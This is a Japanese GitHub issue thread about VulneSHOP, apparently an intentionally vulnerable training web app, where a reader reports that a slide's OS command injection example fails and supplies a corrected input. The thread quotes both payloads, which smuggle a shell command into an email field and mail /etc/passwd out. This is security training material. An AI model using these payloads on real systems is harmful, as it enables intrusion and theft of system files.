### ISSUE TITLE
OSコマンドインジェクションを発生させる入力について（資料のP.35）のご報告

### ISSUE THREAD

**Issue by watarin** [kotowarinone/VulneSHOP#1]
はじめまして、
このような有用なソフトウェア＆資料を公開していただき、ありがとうございます
社内研修で利用させていただきましたが、非常に好評を得ることができました。

http://www.slideshare.net/kotowarinone/web-security-hojp01 の資料について、
社内研修の準備の際に気付いたことを、レポートをさせて頂きます。

P.35 OSコマンドインジェクションですが、
記載されている
```
mailaddress=; cat /etc/passwd| mail user@example.com
```
だと、「Database Error Occured. We could not find your name.」になってしまい。/etc/passwd が書かれたメールも飛びません。
※node.jsのログでもコマンドの発行が行われていないことが確認出来ます。
これは routes/login_db.js の exports.reset_userpassword で先にDB問い合わせ＆更新を行っているので、発生しています。
仕様上DB問い合わせ＆更新を先に行う事は必要だと考えられるので、
入力する文字列を
```
user@example.com"  ; -- " ; cat /etc/passwd | mail user@example.com
```
に変える事で、DB問い合わせを実行でき、/etc/passwd が書かれたメールも飛ぶようになりました。

ご報告までとなります

**Comment by kotowarinone** [comment]
大平浩貴です。お忙しい中で、わたくしの拙いソフトウエアをお使いいただき、本当にありがとうございます。そして、資料の不備でご迷惑をかけただけでなく、改善までご丁寧にお教え下さって、本当にありがとうございます。早めに修正をさせていただこうと思います。かさねて、どうもありがとうございます。-------- 元のメッセージ --------件名: [kotowarinone/VulneSHOP] OSコマンドインジェクションを発生させる入力について（資料のP.35）のご報告 (#1)From: Takashi Watanabe To: kotowarinone/VulneSHOP Cc: はじめまして、
このような有用なソフトウェア＆資料を公開していただき、ありがとうございます
社内研修で利用させていただきましたが、非常に好評を得ることができました。

http://www.slideshare.net/kotowarinone/web-security-hojp01 の資料について、
社内研修の準備の際に気付いたことを、レポートをさせて頂きます。

P.35 OSコマンドインジェクションですが、
記載されている

mailaddress=; cat /etc/passwd| mail user@example.com


だと、「Database Error Occured. We could not find your name.」になってしまい。/etc/passwd が書かれたメールも飛びません。
※node.jsのログでもコマンドの発行が行われていないことが確認出来ます。
これは routes/login_db.js の exports.reset_userpassword で先にDB問い合わせ＆更新を行っているので、発生しています。
仕様上DB問い合わせ＆更新を先に行う事は必要だと考えられるので、
入力する文字列を

user@example.com"  ; -- " ; cat /etc/passwd | mail user@example.com


に変える事で、DB問い合わせを実行でき、/etc/passwd が書かれたメールも飛ぶようになりました。

ご報告までとなります

**Comment by kotowarinone** [comment]
大平浩貴です。
申し訳ありません、ご教示いただいた情報について、取り急ぎ、Slideshareにて、頂いた情報を記載いたしました。
今回は有用な情報をご教示くださって、本当にありがとうございました。

**Comment by watarin** [comment]
お忙しい中ありがとうございました
本チケットはCLOSEとさせて頂きます。
